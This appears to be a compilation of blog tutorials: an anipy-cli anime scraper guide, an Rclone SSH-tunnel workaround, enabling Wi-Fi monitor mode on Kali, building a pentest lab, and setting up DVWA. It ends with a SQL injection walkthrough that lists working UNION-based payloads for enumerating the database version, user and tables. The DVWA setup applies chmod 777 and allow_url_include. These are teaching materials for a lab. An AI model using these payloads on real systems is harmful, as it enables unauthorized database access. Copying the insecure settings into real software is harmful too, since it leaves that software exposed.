This tool scrapes its content from GoGoAnime and can be used as an API. In this tutorial, we’ll walk you through the installation process, usage, and other features of anipy-cli.

Quick Demo

This is a quick demo on how it works. I’m running:

anipy-cli -Dq 720

In this example I’m using the options:

• -D : this downloads the anime. Otherwise you’d stream it.
• -q 720 : this is the quality I want it to download. The default one is 1080p.

1. Installation

To install anipy-cli, it is recommended to use the PyPI package:

python3 -m pip install anipy-cli --upgrade

You can also install directly from the GitHub repository, which may be more up-to-date:

python3 -m pip install git+https://github.com/sdaqo/anipy-cli

Anipy-cli requires mpv for video playback. Install it from the official website. If you prefer to use a different video player, you can specify its path in the configuration file.

Optionally, you can install ffmpeg to download m3u8 playlists using the -f flag. This is recommended if the internal downloader fails, although ffmpeg is comparatively slower.

2. Configuring anipy-cli

When you run the program for the first time, a configuration file will be automatically created. The configuration file can be found at the following locations:

• Linux: ~/.config/anipy-cli/config.yaml
• Windows: %USERPROFILE%/AppData/Local/anipy-cli/config.yaml
• MacOS: ~/.config/anipy-cli/config.yaml

You can customize the settings in this file to suit your preferences, such as video player path, download location, and MyAnimeList credentials.

Windows users who enable the reuse_mpv_window option will need to download and add the mpv-2.dll to their system path. This file can be obtained from SourceForge.

This is how the config.yaml file looks like:

anime_types:
- sub
- dub
auto_map_mal_to_gogo: false
auto_open_dl_defaultcli: false
auto_sync_mal_to_seasonals: false
dc_presence: false
download_folder_path: /path/where/you/want/to/download/anime
download_name_format: '{show_name}_{episode_number}.mp4'
download_remove_dub_from_folder_name: false
ffmpeg_hls: false
ffmpeg_log_path: /usr/local/lib/python3.10/dist-packages/anipy_cli/user_files/ffmpeg_log
gogoanime_url: https://gogoanime.gg/
history_file_path: /usr/local/lib/python3.10/dist-packages/anipy_cli/user_files/history.json
mal_local_user_list_path: /usr/local/lib/python3.10/dist-packages/anipy_cli/user_files/mal_list.>
mal_password: ''
mal_status_categories:
- watching
mal_user: ''
mpv_commandline_options:

You can read the docs to find out more about the configs.

I recommend setting the download_folder_path to your preferred download location.

After you save the file the changes will be in effect.

3. Using anipy-cli

Anipy-cli offers several actions and modes to choose from, along with options to customize its behavior.

To see all available options, run:

anipy-cli --help

usage: anipy-cli [-D | -B | -H | -S | -M | --delete-history] [-q QUALITY] [-f] [-o] [-a]
                 [-p {mpv,vlc,syncplay,mpvnet}] [-l LOCATION] [--mal-password MAL_PASSWORD]
                 [-h] [-v] [--config-path]

Play Animes from gogoanime in local video-player or Download them.

Actions:
  Different Actions and Modes of anipy-cli (only pick one)

  -D, --download        Download mode. Download multiple episodes like so: first_number-
                        second_number (e.g. 1-3)
  -B, --binge           Binge mode. Binge multiple episodes like so: first_number-second_number
                        (e.g. 1-3)
  -H, --history         Show your history of watched anime
  -S, --seasonal        Seasonal Anime mode. Bulk download or binge watch newest episodes.
  -M, --my-anime-list   MyAnimeList mode. Similar to seasonal mode, but using MyAnimeList
                        (requires MAL account credentials to be set in config).
  --delete-history      Delete your History.

Options:
  Options to change the behaviour of anipy-cli

  -q QUALITY, --quality QUALITY
                        Change the quality of the video, accepts: best, worst or 360, 480, 720
                        etc. Default: best
  -f, --ffmpeg          Use ffmpeg to download m3u8 playlists, may be more stable but is way
                        slower than internal downloader
  -o, --no-seas-search  Turn off search in season. Disables prompting if GoGoAnime is to be
                        searched for anime in specific season.
  -a, --auto-update     Automatically update and download all Anime in seasonals list from
                        start EP to newest.
  -p {mpv,vlc,syncplay,mpvnet}, --optional-player {mpv,vlc,syncplay,mpvnet}
                        Override the player set in the config.
  -l LOCATION, --location LOCATION
                        Override all configured download locations
  --mal-password MAL_PASSWORD
                        Provide password for MAL login (overrides password set in config)

Info:
  Info about the current anipy-cli installation

  -h, --help            show this help message and exit
  -v, --version         show program's version number and exit
  --config-path         Print path to the config file.

4. anipy-cli Features

Anipy-cli offers several features, including:

• Faster anime playback than in a browser.
• Local video player support.
• Quality selection for playback and downloads.
• History of watched episodes.
• Binge mode for continuous playback of a range of episodes.
• Seasonal mode for bulk downloading or binge-watching the latest episodes.
• Optional MyAnimeList mode for personalized anime lists.
• Optional Discord Presence for displaying the currently watched anime.

5. Library Usage in Python

Anipy-cli can be used as a library, and the documentation can be found here.

Note: To import the library, use import anipy_cli instead of import anipy-cli, as hyphens are not allowed in Python imports.

6. Other Versions

In addition to the CLI version, there are alternative versions of Anipy available:

• GUI Frontend (Work in Progress) by sdaqo
• Dmenu script by @Dabbing-Guy
• Ulauncher extension by @Dankni95 (not maintained)

These other versions offer different interfaces and integrations, catering to different user preferences.

Conclusion

Now that you’ve learned how to install, configure, and use Anipy-cli, you can enjoy watching and downloading your favorite anime directly from the Linux terminal. Happy anime watching!

The problem arises when you need to authorize the connection by visiting the generated URL like http://127.0.0.1:53682/auth?state=blahblah on your local browser.

This link won’t work on your local machine since it was generated on the remote server.

Furthermore, Rclone does offer an alternative URL for remote/headless server users, but this might result in an Access blocked: Rclone's request is invalid error. At least that’s what happens in my case.

In this tutorial, we will guide you through a workaround using an SSH tunnel to authorize Rclone for Google Drive connection from your remote server without any issues.

Pre-requisites:

1. A remote server (e.g., Digital Ocean, Vultr, Hetzner, etc.)
2. Rclone installed on the remote server
3. SSH access to the remote server

Step 1. Begin Rclone Configuration

Start by connecting to your remote server via SSH and begin the Rclone configuration process with the following command:

rclone config

Go through the motions as you normally would with your preferred settings until you get to the auto config question.

Step 2. Say Yes to “auto config”

When you get to this question say yes. This is because, if you’ve been having my issue, if you select N you’re given a link that leads to “Rclone’s request is invalid”.

Remote config
Use auto config?
 * Say Y if not sure
 * Say N if you are working on a remote or headless machine
y) Yes (default)
n) No
y/n> Y

If you said yes, you’re given a link like this.

http://127.0.0.1:53682/auth?state=ASDha9sd8yhd9pq-ASD

Leave it like that and open a new terminal session or Putty on your local computer.

Create an SSH Tunnel

An SSH tunnel helps by securely forwarding your local computer’s browser traffic to the remote server, allowing you to access and authorize the Rclone-generated URL as if you were on the server itself.

On your second terminal (I’m using cmder on Windows), run the following command:

ssh -L 53682:localhost:53682 -C -N -l <your_user> <your_remote_server_ip>

Replace:

• <your_user> with your actual remote server user
• <your_remote_server_ip> with your remote server’s IP

The session will just hang after you enter the password.

Don’t worry, that’s normal. The tunnel is established.

This is what it will look like.

Copy Rclone Authorization Link to Your Local Browser

Now you can copy the http://127.0.0.1:53682/auth?state=ASDha9sd8yhd9pq-ASD link and place it in your local machine’s browser and it should work to authorize your Google account.

When you’ve authorized it, you’ll get a message Success! All done. Please go back to rclone.

In your command line where you’re configuring Rclone you’ll see the configuration moves forward and will see the message:

Got code
Configure this as a team drive?
y) Yes
n) No (default)
y/n>

You can close the browser window and the terminal and move on with the config. Rclone is now authorized.

Now you can continue with your Rclone config as you normally would.

Frequently Asked Questions

What’s an SSH Tunnel?

An SSH tunnel helps by securely forwarding your local computer’s browser traffic to the remote server, allowing you to access and authorize the Rclone-generated URL as if you were on the server itself.

An SSH tunnel is a secure, encrypted connection between your local computer and a remote server, allowing you to forward local network traffic to the remote server. In this case, the SSH tunnel is created using the command ssh -L 53682:localhost:53682 -C -N -l root <remote_server_ip>.

Here’s a breakdown of the command:

• -L 53682:localhost:53682: This flag sets up local port forwarding, mapping the local port 53682 to the remote server’s localhost at port 53682. It allows you to access the remote server’s Rclone configuration URL from your local browser.
• -C: This flag enables data compression, which can help speed up the transfer of data over the tunnel.
• -N: This flag tells SSH not to execute any commands on the remote server, meaning it only establishes the connection for port forwarding.
• -l root: This flag specifies the remote server’s login username (in this case, ‘root’).
• <remote_server_ip>: Replace this placeholder with the actual IP address of your remote server.

By creating an SSH tunnel, you can securely access resources on the remote server as if they were available locally, enabling you to complete the Rclone configuration process in this tutorial.

Conclusion

This was a short tutorial on how to connect Rclone to Google Drive. Ideally it should have worked when you tell the Rclone config that you’re using a remote/headless server. This is just a clean workaround in my opinion. Let me know of you have any feedback or encounter any issues.

Some sources may be confusing, and lead you to believe that you can only enable monitor mode on TP-LINK TL-WN722N v1 because it has one of the required chipsets for monitor mode, Atheros AR9271, and that you can’t enable it on V2/V3. You can, however.

To start off, if you’re using a virtual machine, first you’ll have to connect your wireless adapter to your Kali Linux virtual machine.

Set up the Adapter

Next, we’ll run some commands to set up the adapter.

First update and upgrade your package index.

sudo apt update && sudo apt upgrade

Reboot your machine.

sudo reboot

Install Linux headers for your Kali Linux.

sudo apt install linux-headers-$(uname -r)

Run the following commands to install the bc package and remote the r8188eu.ko module.

sudo apt install bc

sudo rmmod r8188eu.ko

Clone the Realtek driver from the aircrack-ng Github repository.

git clone https://github.com/aircrack-ng/rtl8188eus

Run the following commands.

cd rtl8188eus

sudo -i

echo "blacklist r8188eu" > "/etc/modprobe.d/realtek.conf"

exit

reboot

After the reboot run the following commands (we have to cd back into the rtl8188eus directory that we cloned earlier):

cd rtl8188eus

make

sudo make install

sudo modprobe 8188eu

Enable Monitor Mode

To enable monitor mode, run the following commands:

sudo ifconfig wlan0 down

sudo airmon-ng check kill

sudo iwconfig wlan0 mode monitor

sudo ifconfig wlan0 up

sudo iwconfig

Here’s the output you should be seeing. You can see that the adapter is set to Mode: Monitor.

Troubleshooting When Enabling Monitor Mode

In some cases it doesn’t work right away. For example you may get the error Error for wireless request "Set Mode" (8B06) : SET failed on device wlan0 ; Operation not permitted.

The solution that has worked for me every time is the following (credit to this Github user’s comment).

Run the following commands in this order:

sudo ifconfig wlan0 up
sudo rmmod r8188eu.ko
sudo modprobe 8188eu
sudo iwconfig wlan0 mode auto
sudo ifconfig wlan0 down
sudo iwconfig wlan0 mode monitor
sudo ifconfig wlan0 up

Now when you check iwconfig you should see the adapter is in monitor mode.

Conclusion

In this tutorial we set up a TP-LINK TL-WN722N V2/V3 adapter to run in monitor mode. If you have any issues or questions then please don’t hesitate to leave a comment. Hope this helped. Thank you.

This post will give you a step-by-step guide on setting up your virtual penetration testing lab and install the various operating systems and vulnerable machines you can start with.

Why Setup A Virtual Penetration Testing Lab

The most apparent reason you would need a penetration testing lab is to practice what you learn and test the different available security tools.

However, other than convenience, there are more reasons as to why you need a virtual lab.

1. Your safety

One is for your safety. Performing a penetration test on a system without permission from the owner is illegal and regarded as a computer crime. That can land you into trouble with the owner or even the authorities if issues escalate beyond control.

To avoid such problems and be on the safe side, you can host the various vulnerable machines available in your penetration testing lab and exploit them.

2. It’s isolated from the real-world environment

This is another reason why a penetration testing lab is necessary. Anything you perform in the lab does not affect the systems or people around you.

For example, if you are trying to get into malware analysis, you will deal with real viruses (the WannaCry ransomware). There is a high risk of this malware spreading through the computer network or even storage drives shared among people in a real-world scenario.

This virus will be isolated with a virtual testing lab and can only impact the installed virtual machine, whichs is much more manageable.

3. It’s a reliable testing platform

Finally, a virtual penetration testing lab is flexible and will provide you with a reliable platform for research and development.

You can develop new security tools, advanced exploitation tactics in a controlled environment without affecting any systems or networks around you.

Understanding Virtualization Technology

When setting up a penetration testing lab, you will have two options to choose from:

1. Use locally-hosted virtualization technology (Recommended)
2. Set up a home lab with additional computer devices and components available.

The latter (home lab) can be a little expensive and complicated to set up and manage. You will need to gather all computer devices and routers and use them to set up a lab. For example, you can have Computer A running your hacking distribution (say Kali Linux) and Computer B or C running your vulnerable machines (say DVWA or BWAPP). You will also need routers, switches, ethernet cables to manage the personal network.

Locally-hosted virtualization is much easier to set up, manage and only requires you to have one powerful PC that supports virtualization technology. That is the method that we will use in this post. Essentially, virtualization allows you to run more than one operating system on your computer. You will need to install virtualization software and use it to run the additional operating systems to get started. Some of the most common softwares are VirtualBox and VMware.

VirtualBox is a free and open-source virtualization software developed by Oracle distributed under the GNU General Public License (GPL) version 2.

VMware, on the other hand, is a commercial software company and has several products to offer. The only free version is the VMware Workstation Player intended for home or personal use. To get many more advanced features, including snapshots, you will need to upgrade to VMware Workstation pro.

Up to this point, I believe you have a good understanding of a penetration testing lab and the technology you need to come up with one.

Let’s dive in and set up our lab. Our virtualization software of choice for this post is VirtualBox.

Step 1. Download and Install VirtualBox on your PC

To get started, you will need to install VirtualBox on your current operating system. That can be Windows, Linux, or macOS. Additionally, install the VirtualBox guest Addition, which consists of drivers and system applications that improve the performance of your virtual machines. Other advantages of guest additions include:

• Mouse pointer integration
• Shared folders
• Improved video support
• Generic host/guest communication channels
• Seamless window management
• Shared clipboard
• Time synchronization
• Automated logins

After a successful install, proceed to launch the virtual box from the application menu.

Step 2. Install Kali Linux on VirtualBox

Once you have VirtualBox installed and running, we can start installing our virtual machines. We will begin by installing the penetration testing distribution of our choice.

In this post, we will use Kali Linux. However, that should not limit you from using other security operating systems like BlackArch Linux, Parrot, etc.

To install Kali Linux virtual machine, we will not need to download the setup ISO file and configure everything from scratch. Nowadays, Kali Linux comes packaged in several formats.

• Bare Metal setup – used to install Kali Linux on your PC in a single boot or multi-boot setup.
• Virtual machines: This option provides you with pre-configured virtual machine images to install on your virtualization software. As of writing this post, the only supported virtualization platforms are VMware and VirtualBox.
• ARM setup: Used for ARM devices such as the Raspberry Pi.
• Cloud setup
• Container setup (Docker)
• Live Boot setup
• WSL (Windows Subsystem for Linux)

In this post, we will download the Kali Linux virtual machine setup for VirtualBox from the official Kali Linux download page. It is a `.ova` file.

After the download is complete, launch VirtualBox from your applications menu and follow the steps below:

1. Click on the File menu and select Import Appliance. Alternatively, you can use the keyboard shortcut (Ctrl + I).
2. A new window will open. Click on the file icon, select the `Kali Linux.ova` file you downloaded, and click Next.
3. In the next window, you will see all the information about the virtual machine. Select the import option at the bottom to import the virtual machine.

After a successful import, you will see Kali Linux listed on your VirtualBox window, as shown in the image below.

You can tweak the settings of the virtual machine depending on your system resources. When done, click Start to boot the virtual machine. You don’t need to perform any configurations, just sit and wait till you get to the Kali Linux login screen.

The default credentials are:

• Username: Kali
• Password: Kali

Step 3. Install Windows 10 on VirtualBox

Microsoft’s Windows is the most popular operating system used worldwide. As an ethical hacker, you need to understand how to exploit and find vulnerabilities on Windows systems and software. For that case, we will also need to install Windows as a virtual machine – specifically Windows 10. You can download Windows 10 ISO file from Microsoft Official website.

Launch VirtualBox and follow the steps below to install Windows 10

1. Click New on the VirtualBox window
2. A small window will open. Enter the name of your new operating system (for example, Windows 10). Click Next.
3. Enter the memory size you wish to assign your new virtual machine and click Next.
4. In the next window, select Create a virtual hard disk now and click Next.
5. Select `VDI` (VirtualBox Disk Image)
6. Select whether you want to use the Dynamically allocated or Fixed Size hard disk on the next screen. Click Next.
7. Set the storage size of your Windows 10 virtual machine. Click Create.

That will create a Windows 10 virtual machine, as shown in the image below.

To install Windows 10 as a virtual machine, click the Start button on the VirtualBox window. A window will pop up and prompt you to select the Windows 10 ISO file you downloaded.

Click Start when done. After a few seconds, you will get to the Windows 10 installation screen.

Continue with the installation process like you were installing Windows natively on your PC.

When done, you can proceed to install Metasploitable.

Step 4. Install Metasploitable

Metasploitable is an intentionally vulnerable Linux-based system used to practice penetration testing.

Like the Kali Linux virtual machine, Metasploitable comes in a pre-configured virtual machine, making the whole installation easier.

Head over to SourceForge and download the Metasploitable VM.

After a successful download, launch VirtualBox and follow the steps below:

1. Click New on the VirtualBox window
2. Set a name for your virtualization machine (for example, `Metasploitable-2`). Click Next.
3. Set the memory (RAM) size. Metasploitable can run efficiently on 512 MB of RAM. Click Next.
4. On the next window, select “Use an existing virtual hard disk file.”
5. Click the file icon and select the Metasploitable VMDK file.
6. Click Create

You should now see Metasploitale virtual machine on your VirtualBox window as shown in the image below:

Click Start to launch Metasploitable.

This vulnerable machine doesn’t come with a Graphical User Interface (GUI). Therefore, when it’s fully booted, all you will see is a console. Use the following default credentials to log in:

• Username: msfadmin
• Password: msfadmin

Final Thoughts

This post has given you a step-by-step guide to setting up a virtual penetration testing guide. You can now use Kali Linux to exploit your target machines (Windows or Metapsploitable). However, that shouldn’t be the end. You can install more vulnerable machines like the Buggy Web Application (bWAPP), Bee Box, OWASP Broken Web Apps, and much more.

Additionally, depending on the field you want to specialize in, you can consider adding more advanced penetration testing systems. For example, if you’re going to specialize in web application security, try using the Samurai Web Testing Framework. Did you come across any issues, or do you have any additional information for our readers? Please, feel free to let us know in the comments and we’ll get back to you as soon as we can.

Performing penetration tests on systems without administrative permission is considered illegal and can land you in huge problems, including a jail term with hefty fines.

Practice makes perfect, but then, where do you practice hacking skills?

There are so many platforms available that you can use to practice penetration testing. Some of these are online platforms like TryHackMe, HackTheBox, etc.

Some like Vulnhub allow you to download vulnerable virtual machines that you can exploit. This post will look at one of the platforms that you can install and set up on your Kali Linux system – The Damn Vulnerable Web Application (DVWA).

DVWA is a vulnerable web application developed with PHP and MYSQL.

Yes! It’s intentionally developed to be vulnerable.

From my experience, it’s a great platform for both beginners and skilled since you have an option to set the desired security level (low, medium, high or impossible).

It’s also a great resource for web developers who wish to develop web applications with security in mind.

To learn a bit on how you can practice on it, you can check our related tutorial on explaining SQL injections using DVWA

Let’s dive in and get started right away.

Note: This tutorial should work on other Debian-based distros, as well.

Step 1. Download DVWA

Since we will be setting up DVWA on our localhost, launch the Terminal and navigate to the /var/www/html directory. That’s the location where localhost files are stored.

cd /var/www/html

Next, we will clone the DVWA GitHub repository in the /html directory using the command below.

sudo git clone https://github.com/ethicalhack3r/DVWA

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for kali: 
Cloning into 'DVWA'...
remote: Enumerating objects: 3398, done.
remote: Counting objects: 100% (85/85), done.
remote: Compressing objects: 100% (54/54), done.
remote: Total 3398 (delta 38), reused 58 (delta 29), pack-reused 3313
Receiving objects: 100% (3398/3398), 1.65 MiB | 4.21 MiB/s, done.
Resolving deltas: 100% (1508/1508), done.

Step 2. Configure DVWA

After successfully cloning the repository, run the ls command to confirm DVWA was successfully cloned.

ls

DVWA  index.html  index.nginx-debian.html

From the image above, you can see the DVWA folder. Now we need to assign Read, Write and Execute permissions (777) to this folder. Execute the command below.

sudo chmod -R 777 DVWA

To set up and configure DVWA, we will need to navigate to the /dvwa/config directory. Use the command below:

cd DVWA/config

Run the ls command to see the contents of the config directory.

ls

config.inc.php.dist

You should see a file with the name config.inc.php.dist. That file contains the default DVWA configurations.

We will not tamper with it, and it will act as our backup if things go south. Instead, we will create a copy of this file with the name config.inc.php that we will use to configure DVWA. Use the command below.

sudo cp config.inc.php.dist config.inc.php

You can use the ls command to check if the file was copied successfully.

ls

config.inc.php  config.inc.php.dist

Now, open the config.inc.php file with the nano editor to make the necessary configurations.

sudo nano config.inc.php

Scroll down to the point where you will see parameters like db_database, db_user, db_password, etc., as shown in the image below. Feel free to change these values, but note them down since you will require them when setting up the database. In my case, I will set db_user to userDVWA and db_password to dvwa.

...
$_DVWA = array();
$_DVWA[ 'db_server' ]   = '127.0.0.1';
$_DVWA[ 'db_database' ] = 'dvwa';
$_DVWA[ 'db_user' ]     = 'userDVWA';
$_DVWA[ 'db_password' ] = 'dvwa';
$_DVWA[ 'db_port'] = '3306';
...

Save your changes (Ctrl + S) and Exit (Ctrl +X).

Step 3. Configure Database

By default, Kali Linux comes installed with the MariaDB relational database management system. You, therefore, don’t need to install any packages. First, start the mysql service with the command below.

sudo systemctl start mysql

You can check whether the service is running with the command:

systemctl status mysql

● mariadb.service - MariaDB 10.5.9 database server
     Loaded: loaded (/lib/systemd/system/mariadb.service; disabled; vendor p>
     Active: active (running) since Mon 2021-07-26 19:13:38 EDT; 8s ago
       Docs: man:mariadbd(8)
             https://mariadb.com/kb/en/library/systemd/
    Process: 1632 ExecStartPre=/usr/bin/install -m 755 -o mysql -g root -d />
    Process: 1634 ExecStartPre=/bin/sh -c systemctl unset-environment _WSREP>
    Process: 1636 ExecStartPre=/bin/sh -c [ ! -e /usr/bin/galera_recovery ] >
    Process: 1699 ExecStartPost=/bin/sh -c systemctl unset-environment _WSRE>
    Process: 1701 ExecStartPost=/etc/mysql/debian-start (code=exited, status>
   Main PID: 1684 (mariadbd)
     Status: "Taking your SQL requests now..."
      Tasks: 15 (limit: 2287)
     Memory: 109.0M
        CPU: 1.339s
     CGroup: /system.slice/mariadb.service
             └─1684 /usr/sbin/mariadbd

To log in to the database, use the command below. In our case, we are using root since that is the superuser name set on our system. If you have something different, then you will need to replace the root.

sudo mysql -u root -p

You will be prompted for a password. However, since we haven’t set any yet, just hit Enter to continue.

Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 45
Server version: 10.5.9-MariaDB-1 Debian buildd-unstable

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

We will first create a new user using the credentials we set in the config.inc.php file in the DVWA directory. Execute the command below, replacing the username and password with your preset credentials.

create user 'userDVWA'@'127.0.0.1' identified by "dvwa";

Query OK, 0 rows affected (0.010 sec)

We now need to grant this user total privilege over the dvwa database. Execute the command below, replacing the username and password with your credentials.

grant all privileges on dvwa.* to 'userDVWA'@'127.0.0.1' identified by 'dvwa';

Query OK, 0 rows affected (0.001 sec)

That’s it! We are done configuring the database. Type Exit to close it.

Step 4. Configure Apache Server

The Apache web server comes installed by default on Kali Linux. Therefore, we don’t have to need to install any additional packages.

To get started configuring Apache2, launch the Terminal and navigate the /etc/php/7.4/apache2 directory.

Note: As of writing this post, the PHP version available for Kali Linux is 7.4. If there is an update, running the command might raise the no such file or directory error. Therefore, you might first want to check your PHP version (ls /etc/php) and replace it accordingly in the command above.

cd /etc/php/7.4/apache2

When you execute the ls command, you will see a file called php.ini. Execute the command below to edit this file using the nano editor.

sudo nano php.ini

Scroll and look for the allow_url_fopen and allow_url_include lines and ensure that both are set to On.

By default, both or one of them is always set to Off.

; Whether to allow the treatment of URLs (like http:// or ftp://) as files.
; http://php.net/allow-url-fopen
allow_url_fopen = On

; Whether to allow include/require to open URLs (like http:// or ftp://) as >
; http://php.net/allow-url-include
allow_url_include = On

Save your changes (Ctrl +S) and Exit (Ctrl + X).

Proceed to start the apache webserver service with the command below. You can check whether the service is running by running the status command.

sudo systemctl start apache2
systemctl status apache2

● apache2.service - The Apache HTTP Server                                   
     Loaded: loaded (/lib/systemd/system/apache2.service; disabled; vendor p>
     Active: active (running) since Mon 2021-07-26 20:25:48 EDT; 5s ago
       Docs: https://httpd.apache.org/docs/2.4/
    Process: 2245 ExecStart=/usr/sbin/apachectl start (code=exited, status=0>
   Main PID: 2256 (apache2)
      Tasks: 6 (limit: 2287)
     Memory: 17.8M
        CPU: 82ms
     CGroup: /system.slice/apache2.service
             ├─2256 /usr/sbin/apache2 -k start
             ├─2258 /usr/sbin/apache2 -k start
             ├─2259 /usr/sbin/apache2 -k start
             ├─2260 /usr/sbin/apache2 -k start
             ├─2261 /usr/sbin/apache2 -k start
             └─2262 /usr/sbin/apache2 -k start

Step 5. Open DVWA on Your Web Browser

Up to this point, we have configured DVWA, Database, and the Apache webserver.

We can now proceed to start the DVWA application. Launch your Web browser and type the URL below.

127.0.0/DVWA

This action will redirect us to the DVWA setup.php page at http://127.0.0.1/DVWA/setup.php.

When you scroll down, you will see some errors in red color. Don’t panic! Click the Create / Reset Database button at the end of the page.

That will create and configure the DVWA database. After a few seconds, you will be redirected to the DVWA login page.

Use the default credentials below to log in.

• Username: admin
• Password: password

After successfully logging in, you will be greeted by the DVWA homepage. On the left side, you can see all the available vulnerable pages you can use to practice.

You will also see the DVWA Security option that enables you to choose the security level depending on your skills.

That’s it! Now, you can start testing out your web penetration skills on the DVWA.

Conclusion

DVWA is a great platform for both beginners and advanced users because of its multi-layered security support. I believe this post has given you a detailed guide on how to set up DVWA on your Kali Linux system.

If you faced issues or errors in any of the steps above, please feel free to let us know in the comments section or by contacting us.

There are several applications that you can use to learn SQL injection.

In this particular post, we will use the Damn Vulnerable Web Application (DVWA). It’s a web app developed in PHP and MySQL and intentionally made to be vulnerable.

If you don’t have DVWA installed yet, feel free to check out our post on How to set up DVWA on Kali Linux.

What is SQL Injection (SQLI)?

SQL injection, commonly referred to as SQLI, is an attack where an application allows unauthorized users to send SQL queries to the database and gain access to information they shouldn’t.

In most cases, hackers use SQL injection to retrieve user/company data, modify database contents or delete the entire database, thus bringing down the whole web system.

In fatal cases, attackers can escalate the SQL injection attack thus, gaining access to the entire underlying back-end infrastructure, server or even perform a Denial of Service attack (DoS).

As of 2021, OWASP Top 10 is a standard awareness framework for developers, and web application security listed Injection (SQL, NoSQL, OS, and LDAP) as the number one vulnerability.

The Impact of a Successful SQL Injection Attack

SQL injection is one of the popular attacks behind the data leaks that we see on the internet and the Dark Web. That includes information like user emails, usernames, passwords, and even credit card information. This attack leads to reputational damage and loss of revenue in regulatory fines. In other cases, attackers can escalate the SQL injection attack and create a persistent backdoor. That allows them to compromise the system for a long time and remain unnoticed.

How an SQL Injection Attack Works

Think of a website with a simple login form with two fields – a username, password, and a Login or Submit button. After you enter the required credentials, when you hit the Submit button, the query sent to the database has this syntax:

SELECT username, password FROM usersdb WHERE username=$user;

E.g., If your name is JohnDoe,

SELECT username, password FROM usersdb WHERE username='Johndoe';

Anyone with a hacker’s mindset can decide to manipulate the application by entering a value different from the username. This value will be an SQL query to reveal or modify the database’s contents. For example, if the attacker entered abc’ OR 1=1–‘ instead of the actual username, the resulting SQL query would look like this:

SELECT username, password FROM usersdb WHERE username='abc' OR 1=1--';

Let’s dissect this input abc' OR 1=1--' and see how it manipulates the database.

• abc': Here we just guessed any username but we added a single quote ‘ at the end. The single quote closes our username field, and the following part becomes an SQL query.
• OR is a conjunction in SQL, and 1=1 will always be true. Therefore, no matter what you put in the username field, the query will always be True and return all the records of the userdb database.
• The --'(double dash) is a comment in SQL. It tells the SQL server not to execute any query past this point. In this particular example, we are using double dash to comment out errors that would arise because of the trailing single quote at the end. You can also use # instead of --. E.g abc' 1=1#

I believe up to this point; you have a good understanding of what SQL injection is. Let’s dive in and exploit actual SQL injection queries on our DVWA.

Setup DVWA for SQL Injection

As stated above, if you haven’t configured DVWA on your system, please check out our post on How to set up DVWA on Kali Linux, which gives you a step-by-step procedure.

If you set up DVWA on your localhost, start Apache Web server and MySQl using the commands below:

sudo systemctl start apache2

systemctl start mysql

Open your browser and enter the URL 127.0.0.1/dvwa or 127.0.0.1/DVWA if you had renamed it. That will open the DVWA login page. Use the default credentials below:

• Username: admin
• Password: password

After a successful login, you will see the DVWA main page. First, click on the DVWA Security on the bottom left, set security to Low, and click Submit.

On the left section of the page, you will see the various vulnerable pages to exploit. Click SQL Injection. You should see a page similar to this below.

View the Vulnerable Code

On the SQL injection page, click the View Source button at the bottom right. That will open a page with the SQL Injection source code written in PHP. When you go through the code, you will see a line like:

$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";

That is the vulnerable line of code. At the end of the line, you can see the user input is concatenated to the SQL query without being validated. That allows us to pass arbitrary commands into the database. Let’s get started.

Basic Injection

On the SQL Injection page, we have a USER ID field. When we enter number 1, the application returns the Firstname and Surname of the user with ID 1.

If we continue trying numbers like 2,3,4 and 5, we still get an output. However, any number from 6 doesn’t return anything. Therefore, our web app has only five users. Behind the scenes, the SQL query that will execute in the database is:

SELECT First_Name,Last_Name FROM users WHERE ID='1';

Other than using the USER ID field, we can also use the URL to pass our queries. When you first enter ID 1 and click submit, the URL will look like this:

http://172.16.81.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#

The injectable part in this URL is the id field. Delete the number 1 and enter a different value like 2 or 3, as shown below. Hit Enter.

http://172.16.81.129/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#

You will notice that this will also return the username and surname of the user with ID 2.

Always True Injection

We looked at this when talking about How an SQL Injection attack works. Enter an input like test' OR 1=1# and hit Enter. That will return the username and surname of all users in the database.

This query will display all records that are True or False. The test' parameter will probably not be equal to any user in the Database and will equal to False. The other part 1=1 will be True since 1 (one) is equal to 1 (one). The # sign to comments out any SQL code or error. The query that executes in the database looks like this;

SELECT first_name, last_name FROM users WHERE user_id = 'test' or '1'='1';

Display RDBMS and Version

By knowing the RDMS (Relational Database Management System) running under the hood, we can successfully send malicious SQL queries. Most Web application technologies like Java, ASP.NET, PHP, etc., can give us a vivid idea of the database powering the web system. For example, PHP web apps will likely use MySQL, ASP.NET apps will most likely run on Microsoft SQL Server, while Java web systems will most likely run on Oracle or MySQL. Additionally, we can try using a combination of web technology and the Operating system to determine the database. For example, a web application running on Apache and PHP on a Linux host is probably using MySQL database.

However, we cannot entirely rely on this information. If the web app is vulnerable to SQL injection, then there are queries we can use to know the RDBMS and RDBMS-version running behind the scenes.

To know the RDBMS, we will enter anything that will make the database throw an error. In this case, we enter a single quote in the USER ID field. That will make the database read anything past the quote as a string instead of an SQL query.

That will throw an error, as shown below.

This error gave us the RDBMS name but not the version. In MySQL, we have two queries that you can use to return the database version – Select version() and Select @@version. We will use the SQL query below to get the database version.

test'union select null, version()#

We can also use:

test'union select null, @@version()#

Display the hostname of our web app

To get the hostname on MySQL, we use the @@hostname query. Enter the input below in the USER ID field.

' union select null, @@hostname#

From the output above, we can see the hostname under the surname as metasploitable. Yours might be different from my mine.

Display Database User

To know the database user, we will enter the input below in the USER ID field. We will use the user() SQL function.

test' union select null, user() #

[analogy]Note: We are using Null to make the starting query valid.[/analogy]

From the output above, we can see the hostname under the surname as root@localhost.

Display the Database Name

To get the database name, we will use the database() function in our SQL query. Please note; this is not the RDBMS but the database on which our web app is running. Enter the query below:

test' union select null, database() #

You can see the name of the database under the Surname – dvwa.

List all tables in the information schema.

The Information Schema is a record that holds information about all other databases maintained by MySQL RDBMS. Enter the query below in the USER ID field.

test' and 1=0 union select null, table_name from information_schema.tables #

The tables are listed under Surname.

List all user tables in the information schema.

To display all user tables, we will start in the informarion_schema database. Enter the query below in the USER ID field and click Submit.

test' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%'#

The user tables are listed under the Surname field.

List all Column fields in the information schema users table

